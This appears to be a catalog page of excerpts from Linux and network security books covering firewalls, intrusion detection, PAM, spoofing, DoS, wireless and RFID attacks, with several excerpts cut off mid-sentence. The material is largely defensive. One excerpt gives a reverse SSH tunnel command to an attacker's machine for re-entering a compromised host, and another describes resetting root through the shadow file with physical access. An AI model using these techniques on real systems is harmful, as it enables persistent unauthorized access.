The Attacker Ebooks Catalog
Silently dropping the packet is almost always the better choice, for three reasons. First, sending an error response doubles the network traffic. The majority of dropped packets are dropped because they are malevolent, not because they represent an innocent attempt to access a service you don't happen to offer. Second, a packet that you respond to can be used in a denial-of-service (DoS) attack. Third, any response, even an error message, gives the would-be attacker potentially useful information.
For each ACCEPT rule above that uses the limit match, there is also a corresponding DROP rule. This accounts for packets levels that exceed the 10-per-second maximum permitted by the limit match once the packet levels are higher than this threshold, they no longer match on the ACCEPT rule and are then compared against the remaining rules in the iptables policy. It is frequently better to just refuse to communicate with an attacker altogether than to allow even thresholded rates of packets through.
To prevent fraud, do not publicize the naming convention for logins and keep the criteria for how an agent or user is identified as secret as possible. An easily guessed login due to publicized or obvious naming conventions weakens the process and then the attacker only needs to guess or force the password. Securing both the login and password inhibits an attacker and strengthens the process. Using publicized, common, or easily guessed account names should only be allowed for local access to minimize dictionary attacks. Typically, however, attackers use disguises, which is why so many attacks focus on fraud and circumvention. Black lists are easiest to fool because they look for something specific to deny. Any change from what is expected will fool the authorization verification, much like wearing a costume might fool a sentry. White lists can also be fooled in the same way. Since a white list holds a list of all that is acceptable and denies anything that's not, all an attacker needs...
Responses can be combined across layers, just as attacks can be. For example, a firewall rule could be instantiated against an attacker at the same time that a TCP RST is sent using a combination of tools like fwsnort and psad (see Chapter 11). One way to knock down a malicious TCP connection would be to use the iptables REJECT target and then instantiate a persistent blocking rule against the source address of the attack. The persistent blocking rule is the network layer response, which prevents any further communication from the attacker's current IP address with the target of the initial attack. Although this may sound effective, note that a blocking rule in a firewall can frequently be circumvented by an attacker routing attacks over the The Onion Router (Tor) network.10 By sending an attack over Tor, the source address of the attack is not predictable by the target. The same is true for attacks where the source IP address is spoofed by the attacker. Spoofed attacks do not require...
When resiliency is applied, it is often a form of denial of service, which means using it without continuity controls. Applying resiliency controls is the same as closing shop when the sun goes down. However, with continuity, you can still close shop and just reroute all customers to a store where the sun is still up. And with networking, the rerouting is nearly instantaneous for customers. However, what's to stop an attacker from using the same attack again and again against each server with resiliency controls Sadly, nothing. This is just how resiliency works best.
Occurred, such as details regarding the connecting applications and equipment, especially if language and regional details are accessible the origin of the connection by IP address and possible physical location and the time-zone information with the time of access. Details such as these will better assure that a user is actually connected to a machine and a location, because otherwise an attacker may be associated with a system that isn't actually there or else an innocent person can be blamed for an attack because his system had been compromised in order to carry out the attack.
Confidentiality is the control for assuring that an asset displayed or exchanged between parties cannot be known beyond those parties. Encryption is the most common kind of successfully applied confidentiality. Even obscurement may be considered a type of confidentiality, although cracking it only requires an attentive and focused attacker who does thorough reconnaissance.
The attacker spoofs his source address as a private address and initiates a connection to one of your TCP-based services. Appearing to be a client attempting to open a TCP connection, the attacker sends you an artificially generated syn message. Your machine responds by sending an acknowledgment, a syn ack. However, in this case, the address that you're replying to isn't the attacker's address. In fact, because the address is private, there is no one out there to respond. The spoofed host won't return an RST message to tear down the half-opened connection. The final stage of TCP connection establishment, receiving an ACK in response, will never happen. Consequently, finite network connection resources are consumed. The connection remains in a half-opened state until the connection attempt times out. The attacker floods your port with connection request after connection request, faster than the TCP timeouts release the resources. If this continues, all resources will be in use and no...
In order to inject data into an established TCP connection, the attacker must know (or guess) the current sequence number used to track data delivery, which depends on the initial sequence number that each side of the connection chose before any data was transmitted. Significant work has gone into some TCP stacks to ensure that initial sequence numbers are randomly chosen (the OpenBSD TCP stack is a great example of this), and the size of the sequence number field in the TCP header (32 bits) also provides some resistance to guessing when a TCP connection cannot be sniffed by an attacker. However, a rather famous example of guessing TCP sequence numbers in the context of tearing down BGP peering sessions in Cisco routers with RST packets was reported by Paul A. Watson in Slipping in the Window TCP Reset Attacks (see for more information). Whenever a network gateway is running iptables, one of the best ways to hinder someone on an internal network from using sequence-guessing attacks...
Once an attacker has gained physical access, getting into a box can be as simple as booting to a CD-based Linux distribution, deleting the root user account password in the etc shadow file (or replacing it with a known password and salt), and booting into the system, normally with full access. This can be accomplished step-by-step as follows
Transport layer responses such as tearing down a suspicious TCP connection with a RST or sending ICMP Port Unreachable messages after detecting an attack in UDP traffic can be useful in some circumstances. However, these responses only apply to individual TCP connections or UDP packets there is no persistent blocking mechanism that can prevent an attacker from trying a new attack. Fortunately, sending TCP RST or ICMP Port Unreachable messages can also be combined with dynamically created blocking rules in a firewall policy or router ACL for an attacker's IP address and the service that is under attack (hence, using both network layer and transport layer criteria as a part of the blocking rule). For example, if an attack is detected against a webserver from the IP address 144.202.X.X, the following iptables rule would restrict the ability of this IP address to communicate with a webserver via the FORWARD chain However, once a blocking rule is instantiated against an attacker, the rule...
The importance of providing reasonable security through file permissions and attributes simply cannot be overstated. They are the first and sometimes the last line of defense from unintended changes to the file system when security holes are discovered in software and or when an attacker gains physical access to a machine. Depending on the depth to which security is implemented in file permissions and attributes, attackers may be significantly delayed or prohibited altogether, depending upon their skill level and determination.
The presence, for example, of development utilities (a C compiler) or interpreted languages (such as perl - but see below -, python, tcl ) may help an attacker compromise the system even further providing tools that could help the attacker to use the compromised system as a base of attack against other systems. 5 Of course, an intruder with local shell access can download his own set of tools and execute them, and even the shell itself can be used to make complex programs. Removing unnecessary software will not help prevent the problem but will make it slightly more difficult for an attacker to proceed (and some might give up in this situation looking for easier targets). So, if you leave tools in a production system that could be used to remotely attack systems (see 'Remote vulnerability assessment tools' on page 149) you can expect an intruder to use them too if available.
24A problem with startx is that it is called from a console login session. A malevolent hacker could circumvent an X screen lockerbykilling the X server, or byswitching to a virtual console and temporarily suspending it. In both cases, the attacker would gain access to the account despite the screen locker. Solutions include running exec startx instead (to replace the login shell with the X server, or using a display manager such as xdm.
A buffer overflow exploit is an attack that leverages a programming error made in an application's source code whereby the size of a buffer is insufficient to accommodate the amount of data copied into it hence the term overflow is used when adjacent memory locations are overwritten. For stack-based buffer overflows, a successful exploit overwrites the function return address (which is on the stack) so that it points into code provided by the attacker. This, in turn, allows the attacker to control the execution of the process thenceforth. Another class of buffer overflow attacks applies to memory regions that are dynamically allocated from the heap.
An SQL injection attack exploits a condition in an application where user input is not validated or filtered correctly before it is included within a database query. A clever attacker can use the nesting ability of the SQL language to build a new query and potentially modify or extract information from the database. Common targets of SQL injection attacks are CGI applications that are executed via a webserver and that interface to a backend database. For example, suppose that a CGI application performs a username and password check against data within a database using a username and password supplied by a web client via the CGI script. If the username and password are not properly filtered, the query used to perform the verification could be vulnerable to an injection attack. This attack could change the query so that it would not only check for equality, but would also modify data with a new query. The attacker could use this way in to set a password for an arbitrary user perhaps...
This concept is not limited to normal accounts it also limits to a certain extent what an application running with root privileges may do. A confined process cannot call certain system calls, even if running as root. Thus even if an attacker gained root privileges, she would still be limited in what she might be able to do.
The problem with this method is that you risk the possibility that an attacker sends IPP broadcasts to your computer announcing available print queues, and you accidentally print to a counterfeit queue. You may believe the job is sent to a local server, whereas in reality it is sent to the attacker's server.
Since late 1999, many sites have become the victims of devastating denial-of-service (DoS) attacks. A DoS attack is basically where an attacker finds a way to disable the services (in this case, the network's Web sites) so that they cannot be provided to anyone. In February 2000, a series of attacks against Web sites such as www.cnn.com,www.ebay.com, and www.amazon.com caused these sites to be knocked off the Internet. The specific type of attack waged against the preceding Web sites was unique, because it involved multiple attacking machines controlled by one attacker. Because of these attacks, a new security term, a distributed denial of service (DDoS) attack was born. In a DDoS attack, an attacker instructs several compromised systems to flood a target system with service requests.The resulting attack can bring down almost any Web site, or generate so much traffic that an entire network can no longer communicate with the rest of the Internet. Attackers are able to wage these DoS...
Reverse tunneling is another popular method for circumventing firewalls, but unlike the tunnels discussed earlier, it allows inbound access that can allow attackers to connect to a machine behind the firewall. It works by using SSH (or some other protocol, usually encrypted) to shovel a shell to a remote machine. This methodology is most often employed by attackers who have successfully compromised a machine and desire to set up an alternative, easier way to reenter the box. The following command line can be used to create a reverse tunnel to an attacker's machine on the Internet root owned machine ssh -R 1337 localhost 22 root attacker machine This creates a connection from owned_machine to attacker_machine and causes attacker_machine to listen on port 1337. When the attacker connects from attacker_ machine to the localhost 1337, it will actually be opening up an SSH connection to owned machine. This assumes attackers only want to be one step away, which is unlikely. A more realistic...
This variable should be set to a higher value to make it harder to use the terminal to log in using brute force. If a wrong password is typed in, the possible attacker (or normal user ) has to wait for 10 seconds to get a new login prompt, which is quite time consuming when you test passwords. Pay attention to the fact that this setting is useless if using program other than getty, such as mingetty for example.
The first attack made against your communications network will most likely be a wardialing attack. In a wardialing attack, the attacker will dial telephone numbers and listen for the unmistakable answer of a computer. Nothing can stop a patient and determined attacker from eventually discovering a telephone number connected to your network. Your best defense is to properly secure all the lines that connect to your network. Once an active connection has been found through wardialing, the attacker will attempt to collect information about the system using banner-grabbing techniques and then proceed through all the common login password attacks.
Running programs SetUID root is a dangerous business that can make a system more prone to being exploited. A bug in a program being run SetUID root can allow an unscrupulous user or an attacker to gain full root access, which is a Very Bad Thing (VBT). A better option for running programs as someone else is to use the sudo command.
User passwords can sometimes become the weakest link in the security of a given system. This is due to some users choosing weak passwords for their accounts (and the more of them that have access to it the greater the chances of this happening). Even if you established checks with the cracklib PAM module and password limits as described in 'User authentication PAM' on page 53 users will still be able to use weak passwords. Since user access might include remote shell access (over ssh, hopefully) it's important to make password guessing as hard as possible for the remote attackers, especially if they were somehow able to collect important information such as usernames or even the passwd and shadow files themselves. A system administrator must, given a big number of users, check if the passwords they have are consistent with the local security policy. How to check Try to crack them as an attacker would if he had access to the hashed passwords (the etc shadow file).
When considering your system security, remember that most burglars don't enter a house through the front door. Most take advantage of an open window or poor security elsewhere in the house. In other words, when configuring your system's security, you should always select every option and extra layer of security, even if it might not appear to be useful. You should lock every door and close every window, even if you don't think an attacker would ever use them.
Attacks on computing systems take on different forms, depending on the goal and resources of the attacker. Some attackers want to be disruptive, while others want to infiltrate your machines and utilize the resources for their own nefarious purposes. Still others are targeting your data for financial gain or blackmail. Here are three major categories of attacks Distributed Denial of Service (DDOS) More advanced DOS attacks are called distributed denial of service attacks. DDOS attacks are much harder to perpetrate and nearly impossible to stop. In this form of attack, an attacker takes control of hundreds or even thousands of weakly secured Internet connected computers. The attacker then directs them in unison to send a stream of irrelevant data to a single Internet host. The result is that the power of one attacker is magnified thousands of times. Instead of an attack coming from one direction, as is the case in a normal DOS, it comes from thousands of directions at once. The best...
Smurfing refers to a particular type of denial of service attack aimed at flooding your Internet connection. It can be a difficult attack to defend against because it is not easy to trace the attack to the attacker. Here is how smurfing works. A smurfing attack uses a malformed ICMP request to bury your computer in network traffic. The attacker does this by bouncing a ping request off an unwitting third party in such a way that the reply is duplicated dozens or even hundreds of times. An organization with a fast Internet connection and a large number of computers is used as the relay. The destination address of the ping is set to an entire
Only hosts accept ICMPv6 redirects routers are explicitly forbidden to listen to them. Otherwise routers could be easily manipulated to forward packets to an attacker instead of the real destination. And if the router accepted ICMPv6 redirects and subsequently sent similar ICMPv6 redirects itself, then a single bad ICMPv6 redirect could result in a self-perpetuating broken routing configuration.
Common tools used for this are sxid, aide (Advanced Intrusion Detection Environment), tripwire, integrit and samhain. Installing debsums will also help you to check the file system integrity, by comparing the md5sums of every file against the md5sums used in the Debian package archive. But beware those files can easily be changed by an attacker and not all packages provide md5sums listings for the binaries they provided. For more information please read 'Do periodic integrity checks' on page 170 and 'Taking a snapshot of the system' on page 86.
Deploy appropriate physical controls. This is especially important in a VoIP environment. Unless the voice traffic is encrypted, anyone with physical access to the LAN could potentially tap into telephone conversations. Even when encryption is used, physical access to VoIP servers and gateways may allow an attacker to perform traffic analysis to some extent, depending on configuration. Organizations should, therefore, ensure that adequate physical security is in place to restrict access to VoIP network components. Furthermore, additional security measures such as authentication, address filtering, and alarms for notifying the administrator when devices are disconnected can mitigate the risks involved in physical security.
First and foremost, anyone that has physical access to the keyboard can simply use the Ctrl+Alt+Delete key combination to reboot the server without having to log on. Sure, someone could simply unplug the power source, but you should still prevent the use of this key combination on a production server. This forces an attacker to take more drastic measures to reboot the server, and will prevent accidental reboots at the same time.
Because you do not have the private key corresponding to the recipients public key, you are not able to decrypt the file you just encrypted. If you want to prevent an attacker from reading the clear text file on your hard disk while still being able to read it yourself, you would have to encrypt it to yourself as well
The module specified in the same line. When a module returns a response indicating a failure, the authentication definitely fails, but PAM continues with other modules (if any). This prevents users from detecting which part of the authentication process failed, because knowing that information may aid a potential attacker. In Listing 10-1, the PAM library calls the pam_securetty.so module, which must return a response indicating success for successful authentication. If the module's response indicates failure, PAM continues processing the other modules so that the user (who could be a potential attacker) doesn't know where the failure occurred. If the next module (pam_rhosts_auth.so) returns a success response, the authentication process is complete, because the control flag is set to sufficient. However, if the previous module (pam_securetty.so) doesn't fail but this one fails, the authentication process continues and the failure doesn't affect the final result. In the same fashion,...
There are several methods of breaking into UNIX (and Linux) systems. Most of them are based on either pretending to be someone else or capturing authentication data on the network. SSH does not trust anything that comes through the network. An attacker on the network can only cause SSH to disconnect, not take over a session, or capture passwords. Here are some of the attacks that SSH protects against (from the SSH FAQ) DNS spoofing Where an attacker forges name server records.
As is the case with signaling-based attacks, transport attacks also rely on the plaintext format of VoIP traffic. Specifically, if an attacker has the ability to intercept valid packets traveling over the network, forging malicious RTP RTCP packets and inserting them in the media stream becomes trivial. Even if the attacker does not have access to the media stream, creating rogue RTP packets that appear legitimate is not a difficult task, given that the attacker has some information on the peers involved in the target communication. The solution for protecting RTP RTCP media streams against media eavesdropping attacks is the introduction of encryption mechanisms. The SRTP and SRTCP protocols, which offer confidentiality, message authentication, and replay protection, represent the standard for providing VoIP transport-level security.
This class of transport-level vulnerabilities encompasses a large number of different attacks, targeting both RTP and RTCP protocols. The common characteristic is that an attacker is able to inject rogue packets into a data stream. Depending on the form of RTP RTCP packets inserted, several outcomes are possible
DHCP servers should only be reachable from the intranet, because an attacker who accesses the information contained in the DHCP configuration can draw up a very detailed network plan. A DHCP daemon offers its service on UDP port 67 and the client uses port 68 both must be blocked by firewalls to the Internet.
Now why is this important Suppose you know the wavelength of a given signal (e.g., 2.4 GHz). With that information, you can design and build a cantenna (more on this later) that allows you to detect and sniff wireless traffic at ranges far in excess of the so-called 100-meter-bubble, which most people assume is the maximum coverage of a wireless access point. This means that the attacker can stay out of visual range and outside of your physical perimeter and still be able to hack away at your wireless infrastructure.
For RF and other forms of electromagnetic energy, amplitude is indicative of the strength of the electric field of the waveform and thus the strength intensity of the emitted signal. The greater the amplitude, the stronger the signal strength as the intensity of an electromagnetic wave is directly proportional to the square of the amplitude. Amplitude indicates to an attacker that a particular signal is strong when it reaches his or her antenna. This means the encoded higher-layer protocol (e.g., 802.11), which is embedded inside the signal, is easier to decode, meaning sniffing the air will be easier. If the amplitude of the RF signal can be reduced by the administrator of the wireless device, then an attacker's WNIC would have a much harder time decoding the embedded protocol(s). Assuming the wireless hardware is configurable, the defender can do this by limiting the power output of the RF transmitter, e.g., reducing it from 30 mW to 1 mW.
From a hacker's perspective, the attacker would try to reduce the amount of attenuation caused by the various factors in an attempt to get better RF signal reception from the target. The attacker is also helped by the fact that RF diffracts. Diffraction is the ability of an RF signal to bend around obstacles in its path to the receiver. Whether a given signal is able to do this depends on its wavelength vis- -vis the size or diameter of the obstacle encountered. The longer the wavelength relative to the diameter of the obstacle, the easier it is to propagate around the obstacle. This is why you can often receive an AP's signal from behind a sign-post or small tree that is positioned between the signal receiver and the AP. Understanding the causes of attenuation allows the attacker to reposition himself or herself accordingly to move closer to a signal source or reposition in such a manner that he or she has line-of-sight to the signal source so that the only attenuation encountered is...
With traditional UNIX and Linux systems, when a user got root access to your computer, he owned the machine. The root user (or whoever took over as root user) could override ownership, read write execute permissions, and processor scheduling priorities. Likewise, an attack on a Web server (httpd daemon) could allow an attacker full privileges of the apache user account, instead of limiting the attack to a single set of virtual host resources.
Often, a attacker is not able to get a signal strong enough to decode the embedded communications protocol successfully. This is where the attacker applies his or her understanding of the concept of gain and that corresponding application of the proper antenna type to enhance signal reception and transmission.
To combat diffraction, you may opt to use RF equipment with short wavelengths (i.e., high frequencies). An example is eschewing 802.11b g-based equipment in favor of 802.11a-based equipment. This is because, as distance from a signal grows, a given signal may be unable to propagate around obstacles encountered, such as walls or buildings. This results in a shadow zone on the leeward side of an obstacle between the transmitter and the receiver. The shadow zone is an area void of the RF signal that is unable to bend around the obstruction. An attacker in this area would be unlikely to effect any RF-based communications with the signal source. Of course, the use of 802.11a in place of 802.11b g requires a cost-benefit-analysis for corporate deployments because most equipment on the market is designed to be b g compatible.
From a technical perspective, it is extremely difficult to prevent RF spectrum analysis from occurring simply because it is a passive exercise. The attacker is not sending out any RF energy packets bearing higher-layer protocol information. He or she is only passively receiving all RF energy packets within the spectrum analyzer's frequency range. However, you can potentially identify if an attacker is performing spectrum analysis in the immediate area through simple observation. A spectrum analyzer would be either a handheld device or an external dongle (e.g., WiSpy) or an add-on device that attaches to a laptop. To make more effective use of the spectrum analyzer, the attacker is also likely to walk around taking sampling readings. Thus, physical observation with the human eyeball is the best defense against an attacker roaming through any given location taking RF readings.
As with RF spectrum analysis, frame analysis is a passive exercise. The attacker is not sending out any 802.11 frames, only passively receiving whatever AP- or station-transmitted frames come its way. One possible method of interfering with some portion of the frame capture during the sniffing session that must precede the frame analysis is sending out crafted frames that exploit a denial-of-service (DoS) vulnerability against the chipset driver combination the attacker is using. However, this is difficult, to say the least, because (1) you would have to know first whether an attacker was around (remember, he or she is running passive silent in the first place) and (2) if any legitimate users are running the same chipset driver combination as the attacker, you might accidentally target them instead if you wrongly guessed the MAC address of the station you wanted to attack.
In this chapter we've covered some of the more advanced features offered by psad to analyze iptables log messages for evidence of attacks that exist in packet headers, and to passively fingerprint remote operating systems and report information to DShield. None of these activities involve actively responding to attacks, or the detection of suspicious application layer payloads. In Chapter 8, we'll see how psad can dynamically instantiate blocking rules against an attacker, and in Chapter 9 we'll see how iptables rules can emulate Snort rules with full application layer matching capabilities.
In contrast, active response refers to the set of mechanisms that can be employed against an attacker (once an attack is detected) that do not necessarily thwart the attack. The fact that active response isn't always able to prevent the initial attack is an important distinction, and it solidly delineates the difference between intrusion prevention and active response. One of the best ways to see this is with a motivating example. For anyone still running a vulnerable version of BlackICE or RealSecure, the first priority would be to download and install a patch from http www .iss.net download. Another option is to configure a local packet filter to not forward any UDP packets with a source port of 4000 into the internal network however, this would be at the expense of potentially breaking ICQ services that span the firewall. Obviously, this is not an optimal solution, so what is really needed is the ability to detect packets that are specifically associated with the Witty worm, and...
There are other general measures that make it harder for a potential attacker to gain control over the machine These were covered in Section 2, Host Security on page 2-1, and are part of general system administration. Beyond those general measures, you can limit access to a service to limit the number of potential attackers. While the public web site of a company usually should be accessible from everywhere, it might be possible to limit the hosts from which access to others services is allowed.
Automatically responding to an attack by generating session-busting traffic or modifying a firewall policy is not without consequences. An attacker may quickly notice that TCP sessions with the target system are being torn down or that all connectivity with the target has been severed. The most logical conclusion to draw would be that an active response mechanism of some type has been deployed to protect the target. If the active response system has been configured to respond to relatively innocuous traffic such as port scans or port sweeps, it becomes exceedingly easy for an attacker to abuse the response mechanism and turn it against the target. This also applies to malicious traffic that can be delivered in such a way that it does not require bidirectional communication with the target (which enables the attack to be spoofed). The Witty worm is a perfect example of this.
However, be forewarned that a chroot jail can be broken if the user running in it is the superuser. So, you need to make the service run as a non-privileged user. By limiting its environment you are limiting the world readable executable files the service can access, thus, you limit the possibilities of a privilege escalation by use of local system security vulnerabilities. Even in this situation you cannot be completely sure that there is no way for a clever attacker to somehow break out of the jail. Using only server programs which have a reputation for being secure is a good additional safety measure. Even minuscule holes like open file handles can be used by a skilled attacker for breaking into the system. After all, chroot was not designed as a security tool but as a testing tool.
Though you can use tools like Airsnarf to do this, it can also be done manually by setting the WNIC in master mode, configuring a HTTPD server to serve pages matching the captive portal of the spoofed service, and establishing a DHCPD and DNS server so the victim receives the IP address you choose to give him or her and resolves all DNS requests back to the attacker's ph00ling box. Another variation of this attack comes in the form of an AP acting as a wireless distribution system (WDS) to a legitimate AP it broadcasts itself as the legitimate AP and passes on all of the client's data onto the real AP via WDS methods, but not before making a copy of the data received and sent onward.
The ability to dynamically reconfigure the local iptables policy implies that the response takes place at the network layer for example, an attacker's IP address is blocked from talking up through the IP stack. If an attacker has an established TCP session with any server in the local network when a blocking rule is instantiated, then (because there is no TCP reset generated along with the blocking rule) all TCP packets will be dropped, and the endpoint TCP stacks will attempt to retransmit data until they timeout.1
The most important variable that controls whether or not psad enters into active response mode is ENABLE_AUTO_IDS, which can be set to either Y or N within the etc psad psad.conf file. When this feature is enabled, several other variables (discussed below) control various operational aspects of psad as it endeavors to automatically block attackers. 1 As discussed in Chapter 3, iptables can send a reset packet in order to knock down a TCP connection through the use of the REJECT target, but psad does not support this in conjunction with instantiating a general DROP rule against an attacker. The ENABLE_AUTO_IDS_REGEX and AUTO_BLOCK_REGEX variables allow the act of adding a blocking rule against an IP address to be tied to whether or not a logging prefix matches a particular regular expression. This is most useful for blocking IP addresses, but only after monitoring an attack that requires bidirectional communication through an established TCP session. Because port scans are easily...
RPC-based services have had a bad record of security holes, although the portmapper itself hasn't (but still provides information to a remote attacker). Notice that some of the DDoS (distributed denial of service) attacks use RPC exploits to get into the system and act as a so called agent handler.
Additionally, tunnels may be used to hide the actual source of a packet If an attacker creates an IPv6 packet with a fake IPv6 source address and then encapsulates it using its real IPv4 address as source, this packet will pass all filters that detect bad source addresses on the way to the tunnel exit point. There it will be decapsulated and then sent to the final recipient. Due to the decapsulation the recipient can't identify the original sender.
This section outlines the various steps an attacker auditor would take when engaging an organization's wireless clients. Here are the various phases In the first phase of wireless client fingerprinting, an attacker tries to determine the wireless chipset as well as the driver version used on each detectable wireless client based on a field (duration field) found in almost every wireless packet emitted. For clients with WEP profiles using Open System authentication, a vulnerability that affects a particularly large segment of WNIC users is called the WEP Client Communications Dumbdown (WCCD) vulnerability. This vulnerability allows attackers auditors to trick wireless stations with vulnerable hardware drivers into connecting to an AP that has been configured to match the SSID of client profiles set to use WEP. Discovered in early 2006 by ThinkSECURE -2006-0003 and this vulnerability affects the Intel Centrino drivers on the Windows platform primarily but may affect others as well.
Client-side wireless security auditing is not usually carried out during many wireless security audits. However, it is necessary to do so as attackers can exploit the weaknesses residing on vulnerable wireless clients. And once an attacker can compromise a wireless client that is connected to a corporate wired network, he or she is able to freely enumerate for and exploit weaknesses within your protected wired network because the attacker is now a trusted entity (due to entering via the legitimate wireless client). Wireless drivers, like any other piece of software, should be kept up to date in order to reduce the attack surface presented to attackers. Defenders should test the WNIC drivers that are used in corporate machines with the wireless fuzzing tools mentioned earlier and report all problems found to the hardware vendor in order to obtain patched versions.
There are several things to note about this active response configuration. First, psad will not permanently block an attacker by virtue of the AUTO_BLOCK_TIMEOUT variable (it will only add the blocking rules against an attacker for 3,600 seconds one hour). Secondly, an attacker must reach at
We've barely even scratched the surface of system security in this subsection, though we've tried to give you good pointers on where to start and where to get the information you need to learn more. But let us give you some sage advice on security in general, since it's a painful truth to learn There is no such thing as a fully secure system. Securing systems isn't about making it impossible for a breach to occur. It's about making the breach so difficult that it's not worth it to the attacker. This definition is pretty fluid, because if your attacker is a bored 14-year-old sitting in a basement somewhere chewing on cold pizza, you can bet that he'll leave your system alone if it's even marginally secure. But if you're keeping around top secret information, then it's a lot more difficult to have the system be secure enough that breaking into it isn't worth it, from a cost benefit point of view, to the attackers.
The pam_securetty.so module is not enabled for SSH in the default SLES8 installation. It might be desirable to deny superuser SSH network access even though the data is encrypted. This can help prevent an attacker from guessing the root password. See Table 14-4 on page 197.
An attacker can try to enumerate all Bluetooth devices in close proximity by issuing a device inquiry. A device enumeration is often the first step for an attacker to enumerate all the targets that are of interest. On Linux, you can use hcitool to perform device inquiries (using the scan option) it lists all the devices in the neighborhood that answer device inquiries.
At this point, the attacker is well aware of the fact that an active response mechanism is being used to protect the target network. In addition, there is no edict placed on the attacker not to abuse IP in an effort to make it appear as though a scan originates from, say, an IP address associated with Yahoo 's network. As long as the local network and or the local ISP has not deployed an anti-spoofing measure (such as egress filtering against nonlocal IP addresses on appropriately positioned border routers and or firewalls), then it is exceedingly easy for the attacker to pound arbitrary bits into the source address field in the IP header The Nmap process running on the scanning system never sees any packets (either SYN ACK packets for open ports or RST ACK packets for closed ports) return from the target for two reasons first, iptables is intercepting most of them, and second, any packets that are generated by the target are sent to the (spoofed) 68.142.X.X address instead of back to...
Are returned after all modules in the stack have been executed. The technique of delaying the report to the calling program until all modules have been executed may keep attackers from knowing what caused their authentication attempts to fail and tell them less about the system, making it more difficult for them to break in. is aborted, and control is returned immediately after a module fails. This technique may expose information about the system to an attacker. However, if it prevents a user from giving a password over an insecure connection, it might keep information out of the hands of an attacker.
Another server variable worth checking is the _SERVER 'HTTP_REFERER' variable. This variable holds the name of the previous page viewed, and can help you eliminate a certain class of web attacks. Suppose you create a simple form that saves data to a database, emails people, or anything that relies on valid user input. You might have even gone to great lengths to perform client-side input validation, and specified maximum lengths on your forms. Unfortunately, anything you might expect as input from a web client can easily be corrupted using an external form. Any site attacker can easily copy your form's HTML markup, and then modify it to suit their needs whether it be for information-gathering, cross-site scripting, SQL injection, or anything really. This is the kind of code that can often be found on many home-brewed CMS systems, or some other kind of custom document-retrieval script. Unfortunately, it's a huge security risk. What would happen if an attacker submitted the value etc...
The goal of this type of attack is to overpower the RF field so that communication with RFID tags in close proximity is rendered unusable. If an attacker uses enough power, she or he may be able to disable communications with all RFID tags in an entire warehouse. This attack may have severe effects on RFID business applications. An example of this would be a signal jamming attack carried out against a large retail location. The retailer could be using RFID tags to track shipments and inventory and may also be storing pricing and other information on the tags. A successful attacker, using an RFID jamming device and an illegally overpowered antenna, who interfered with this process would make data collected by the RFID system unreliable, forcing the location to return to a pencil and paper system to confirm its inventory.
If an attacker can transmit a specifically crafted signal to the reader during anticollision, he or she can implement a DoS against the reader by simulating an unlimited number of tags within range. The details of this attack are very specific to the respective protocol, but almost all RFID anti-collision systems have a possible attack vector.
This is the same basic attack that applies to standard network applications and database backends. Using the air protocol interface, an attacker may have the ability to create malicious content on tags or, by using a rogue reader or writer, to simulate and modify RFID tags. An example of this type of attack is found in proximity access cards or badges used to control access into secure areas and buildings. Most proximity badges contain a facility code and a user ID. The unique user identifier code and facility code are captured by the reader and then sent to the backend for processing. The facility code and ID are matched to the access control for each area and access is either granted or denied. An attacker could write a SQL injection contained within the user or facility code data area on the badge and gain access without ever having to clone a card. If successful, the attacker would have the ability to bypass the security of most RFID proximity controls.
In the case of fwsnort (particularly when deployed locally on the same system targeted by an attacker), we don't need to worry about fragmentation issues because the defragmentation algorithm applied is the algorithm of the actual victim IP stack. With fwsnort, network defragmentation is performed by using the Netfilter connection-tracking subsystem (which must defragment traffic in order to classify packets into the correct connection) together with an fwsnort policy. The application layer inspection performed by fwsnort takes place after the Linux IP stack has already defragmented the traffic.
This signature is useful for detecting attempts of an attacker to use a webserver to scan other systems that may be more easily accessed by the webserver local firewall rules may be more forgiving to webserver communications than to the attacker's IP address (especially if the webserver is directly connected to an internal network). An attacker would typically abuse a CGI application that does not properly filter user input in order to perpetrate such a scan attempt. Another way to write a signature to detect inappropriate Nmap executions via a webserver is to look for Nmap output that is returned from a webserver to a web client. This is more effective for detecting successful Nmap executions instead of detecting mere attempts to abuse a CGI application because a (non-malicious) server does not have the freedom to obfuscate the data it returns to try and evade intrusion detection systems attackers do have this freedom
When an attacker breaks into a system, he will usually try to gain control by making his own changes to system administration files, such as password files. He can create his own user and password information, allowing him access at any time, or he can simply change the root user password. He can also replace entire programs, such as the login program, with his own version. One method of detecting such actions is to use an integrity checking tool such as Tripwire or Advanced Intrusion Detection Environment (AIDE) to detect any changes to system administration files. AIDEI is a free and enhanced alternative to Tripwire (Ubuntu main repository). It provides easy configuration and detailed reporting.
The weak point in many Linux Unix systems has typically been user administrative accounts. If an attacker manages to gain access to an administrative account, he will have complete control over the services the account manages. Access to the root user provides control over the entire system, all its users, and any network services it is running. To counter this weakness, you can use the mandatory access control (MAC) structure. Instead of an all-or-nothing set of privileges based on accounts, services and administrative tasks are compartmentalized and separately controlled with policies detailing what can and cannot be done. Access is granted not just because a user is an authenticated user, but when specific security criteria are met. Users, applications, processes, files, and devices can be granted only the access they need to do their jobs, and nothing more.
By using stateful inspection, Snort can determine whether someone is portscanning (a process that usually is part of a hacker's initial reconnaissance while getting the lay of the land). Also, Snort can detect stealth or malformed packets, which are more likely indications of probes sent out from a would-be attacker. By comparing some of the basic building blocks of a packet across time and across different hosts, the preprocessor plug-in can get a tidy view of what would otherwise be invisible behavior. This powerful benefit is one of the many imparted by using preprocessing to round out your Snort installation.
I disable_evasion_alerts The disable_evasion_alerts option is an advanced setting that detects special cases where an attacker tries to fool an IDS detection engine into ignoring a packet, but the packet gets to the target. talking about packet transmissions over a network. A TTL setting can help keep tabs on how much time a packet flow takes to reach its destination. Sometimes an attacker tries to evade detection or masquerade as being somewhere else by twiddling the TTL settings with a session. You can use the ttl_limit option to alert you to a big variation in the TTL setting across a stream of traffic. This parameter is hard to tune properly, but it's a safe bet to use 10 as a starting point as the maximum TTL.
On lightweight platforms such as mobile phones, flashing the memory lets you change the platform configuration and execution environment, enabling the attacker to access many unauthorized features, from the ability to bypass the SIMlock mechanism that prevents the user from using SIMcards from a different mobile operator to play any DRM contents (e.g., ring tone, music file) to the more dangerous ability to change the mobile unique identifier (International Mobile Equipment Identity IMEI) making the attacker more difficult to trace on any mobile network. This kind of attack has been facilitated by the creation of cheap dedicated hardware, leading to a dramatic increase in the number of stolen phones, which can be reprogrammed with ease.
The decoding and normalization of certain types of network traffic is an important preprocessing chore. Pattern matching systems like Snort can fail when an attacker introduces subtle variations. These variations are perfectly acceptable and even warranted in most cases, but they can be misused by attackers.
